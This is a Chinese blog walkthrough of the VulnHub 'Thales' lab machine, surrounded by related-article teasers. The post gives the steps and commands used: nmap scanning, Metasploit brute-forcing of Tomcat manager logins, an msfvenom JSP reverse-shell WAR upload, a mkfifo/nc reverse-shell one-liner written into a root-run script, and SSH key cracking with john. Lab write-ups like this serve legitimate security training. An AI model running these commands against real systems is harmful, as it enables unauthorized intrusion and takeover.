vulnhub靶场9:Thales

最新推荐文章于 2024-10-11 16:20:01 发布
最新推荐文章于 2024-10-11 16:20:01 发布
阅读量211 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Genarior/article/details/131367125
版权

1、nmap -sn 192.168.50.0/24

2、nmap -p- -A 192.168.50.108 得到开放8080 22

3、访问8080发现是tomcat

 4、发现有管理界面,使用msf进行爆破口令

msfconsole

search tomcat

5、使用msf进行tomcat弱口令爆破

use 22

show options 查看选项

set RHOSTS 192.168.50.108

set RPORT 8080

run

得到账号、密码 tomcat/role1

 6、登录以后,发现上传点

7、 msfvenom创建反弹shellpayload

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.50.190 LPORT=4444 -f war -o upfile.war

8、nc监听 nc -lvvp 4444

9、访问页面,得到反弹shell

升级成交互式shell

    python3 -c 'import pty;pty.spawn("/bin/bash")' 升级切换交互式shell

    export TERM=xterm-256color      //设置终端环境变量

    Ctrl+Z

    stty -a

    stty raw -echo;fg   //关闭回显,调起后台进程到前台

    reset

    stty rows 25 columns 77 //规定行列,能使其顺序不乱

 10、查看/home/thales/note.txt,提示有个shell

 11、查看该文件权限,具有root权限

写入反弹shell脚本

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.50.190 8888 >/tmp/f

本地nc监听8888端口,得到root权限的反弹shell,得到第一个flag

12、查看/home/thales/.ssh目录,发现私钥,拷贝下,使用ssh2john转下,并使用john破解

ssh2john pri_key keyhash

john --wordlist /usr/share/wordlist/rockyou.txt keyhash

john --show keyhash

得到thales密码,切换到该账户 su thales 得到第二个flag

---------------------------------------------------------------------------------------

1、msfconsole的使用,暴力破解tomcat弱口令

## 启动msf

    msfconsole

    search tomcat //查看相关攻击库

    use 22 //选择攻击库

    show options //查看选项

    set rhosts 192.168.8.111 //设置ip

    set rport 8080 //设置端口

    run //执行

## msfvenom 创建恶意payload

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.50.190 LPORT=4444 -f war -o upfile.war   //创建反弹shell payload

## 使用 multi/http/tomcat_mgr_upload 模块进行上传获得shell

    use exploit/multi/http/tomcat_mgr_upload

    set LHOST 192.168.50.190

    set LPORT 4444

    set HttpUsername tomcat

    set HttpPassword role1

    run 得到session

    getuid 查看当前用户

    shell获得shell

Genarior
关注
专栏目录
Vulnhub靶场THALES: 1
DG_s1mple
03-17 3154
环境准备 下载靶机导入到vmware 信息收集 我们使用arp-scan命令查找靶机的IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.17 我们使用nmap扫描靶机开启的服务 发现靶机开放了tomcat和ssh,我们先访问他的tomcat 渗透开始 tomcat发现可以登录,我们尝试爆破一下 成功爆破出账号密码,我们返回网站登录 发现manager app页面可以上传文件 我们使用如下命令创建一个反弹shell的木马上传 msfvenom -p ja
Vulnhub靶场THALES:1
Nailaoyyds的博客
07-05 1341
目录前言描述一、信息收集0x00 arp-scan扫描0x01 nmap扫描二、漏洞利用0x00 msfconsole利用0x01 文件上传三、权限提升0x00 反弹shell0x02 字典爆破​编辑0x03 user.txt0x04 反弹shell0x05 root.txt总结 arp-scan -I eth1 -l #扫描网卡局域网 扫描到两个网段 不确定是哪个 nmap 扫描扫描两个IP 开放端口22和8080 访问站点,发现需要用户名密码 msf搜索tomcat login 配置pay
vulnhub靶场Thales
qq_58091216的博客
02-04 1049
我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh。一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看。我们在thales目录下发现了隐藏的.ssh文件,我们进行查看。
vulnhub靶场THALES: 1
「 虚幻私塾」
10-30 799
在.ssh下发现密匙:id_rsa文件,将密匙文件复制保存到本地文件upfine,然后命令:python2 /usr/share/john/ssh2john.py /home/kali/Desktop/upfine > passwd生成密码本,然后命令:john --wordlist=/usr/share/wordlists/rockyou.txt passwd进行破解,成功获取密码:vodka06。切换thales账户:su thales,读取下user.txt文件,成功获取到flag信息。
Vulnhub——THALES: 1靶场
Re1_zf的博客
11-15 855
1、msfvenom生成反弹shell的war文件2、python脚本转换公钥文件为JTR攻击兼容文件python3 ssh2john.py 需要处理的文件 > 输出的文件3、john爆破ssh公钥(基于JTR攻击兼容文件)john --wordlist=/usr/share/wordlists/rockyou.txt 爆破文件4、利用mkfifo命令实现权限维持mkfifo创建的是一个管道文件,这里这种情况下这个文件中的内容会实时更新,即输入的命令会被实时读取。
VulnHub靶场Thales
m0_73985767的博客
12-18 1213
kali虚拟机有两个网卡,一个是仅主机模式,一个是NAT模式,应为校园网原因不能使用桥接模式。跑了一遍没有出来,发现没有tomcat用户名,然后我就自己创建了个字典加进去,就出来了。后来我用哥斯拉生成了一个木马,上传连接的时候,发现我傻B了,木马路径是war包名/文件名。user.txt没有权限查看,应该是一个flag,有个ssh文件,下载id_rsa。尝试了weevely工具生成木马上传,发现是404。有个脚本文件,属主是root,可以用来提权。从Tomcat 9.0.52入手。注意python版本。
vulhub thales:1 靶场
GRXHunter的博客
04-12 3484
vulhub thales:1靶场
VulnHub-Thales打靶记录
qq_43534481的博客
09-05 180
Vulnhub thales wp 靶场
vulnhub靶机检测不到IP地址解决办法
热门推荐
liver100day的博客
07-26 1万+
vulnhub靶机检测不到IP地址1.无法检测到IP问题2.查询问题原因3.解决问题3.1 重新配置虚拟网络3.2 启动网卡服务4.Kali连不上网解决办法 1.无法检测到IP问题 vulnhub是一个非常棒的靶机平台,里面有许多的靶机资源。当我们下载靶机完毕,准备进行测试学习的时候,使用Mac&kali无法检测到靶机的IP,arp-scan、nmap、netdiscover等命令时均未检测到靶机的IP地址,因为我们无法获取靶机的IP地址的话就没办法进行下一步。 2.查询问题原因 确保攻击机与靶机同
Electronics-vs-Zombies:Thales Lohn和VítorMorigi编写的C程序设计学科项目
05-22
《电子与僵尸:Thales Lohn和Vítor Morigi的C程序设计学科项目》是一个结合了趣味性与教育性的编程项目,旨在通过模拟电子与僵尸的互动,教授C语言编程的基础知识和技巧。该项目可能包含源代码、文档和其他辅助资源...
Thales-Reveal-Presentation:研究显示演示文稿
05-11
- **安装与设置**:下载Thales-Reveal-Presentation的源码(如压缩包中的"Thales-Reveal-Presentation-master"),解压后在本地服务器环境下运行,如使用`http-server`或`python -m SimpleHTTPServer`。 - **创建...
THALES
10-24
"THALES"是一个可能与字体相关的主题,但提供的信息相当有限。在IT行业中,字体通常涉及到文本显示、排版设计、编程以及用户界面等多个领域。THALES这个名字本身并不直接指向一个特定的字体或技术,因此我们需要进行...
【WEB应用安全测试指南–蓝队安全测试2】--超详细-可直接进行实战!!!亲测-可进行安全及渗透测试
Dreams°的博客
10-10 2007
任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下 web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过任意文件下载漏洞可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器 API、文件标准权限进行攻击。严格来说,任意文件下载漏洞并不是一种 web漏洞,而是网站设计人员的设计“漏洞”
什么是网络安全
m0_66268916的博客
10-07 553
全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面,包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行,防止数据被破坏、更改、泄露。
ISO 26262标准下的汽车软件架构设计与安全要求
yayuanjingkeji的博客
10-08 408
ISO 26262标准下的汽车软件架构设计与安全要求ISO 26262标准,作为国际公认的汽车功能安全标准,为汽车电子和电气系统的软件开发提供了详尽的指导与规范。在汽车软件架构设计中,遵循ISO 26262标准不仅关乎产品的功能实现,更直接关系到车辆的安全性能。以下将从几个关键方面探讨ISO 26262标准下的汽车软件架构设计。
智能运维与问题诊断工具:提升生产环境的安全稳定性
TechEnthusiast的博客
10-09 329
Prometheus是一个开源的监控和告警系统,而Grafana是一个强大的可视化平台。两者结合使用,可以为系统提供全面的监控和分析能力。ELK Stack是一套强大的日志管理和分析工具集,能够收集、处理、存储和可视化大量日志数据。Datadog是一个全面的监控和分析平台,提供了对应用、服务器、数据库和云服务的实时监控。New Relic提供了全面的应用性能监控和诊断能力,帮助开发团队快速识别和解决问题。PagerDuty是一个事件响应平台,帮助团队快速响应并解决IT事件和中断。
msvcr100.dll丢失的解决方法,如何安全下载 msvcr100.dll 文件:完全指南
最新发布
电脑修复君的博客
10-11 671
在使用 Windows 操作系统的电脑上运行某些程序或游戏时,可能会遇到一个常见的错误消息,提示缺少 msvcr100.dll 文件。这个 DLL 文件是 Microsoft Visual C++ 2010 Redistributable Package 的一部分,对于运行依赖于 C++ 的软件来说至关重要。如果你正面临 msvcr100.dll 缺失的问题,本文将引导你如何安全地下载并恢复 msvcr100.dll 文件,确保你的应用程序可以顺利运行。
数据中心物理安全的历史和演变
网络研究观
10-10 918
在当今的数字时代,数据中心托管已成为我们互联世界的支柱。
Thales AC12 GPS手册:参考指南
"Thales GPS AC12 手册是一份英文版的技术文档,详细介绍了Thales公司的A12™, B12™ & AC12™系列OEM板的使用和功能。这份手册包含了产品的技术规格、操作指南以及可能涉及的法规遵从性信息。Thales Navigation是该...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值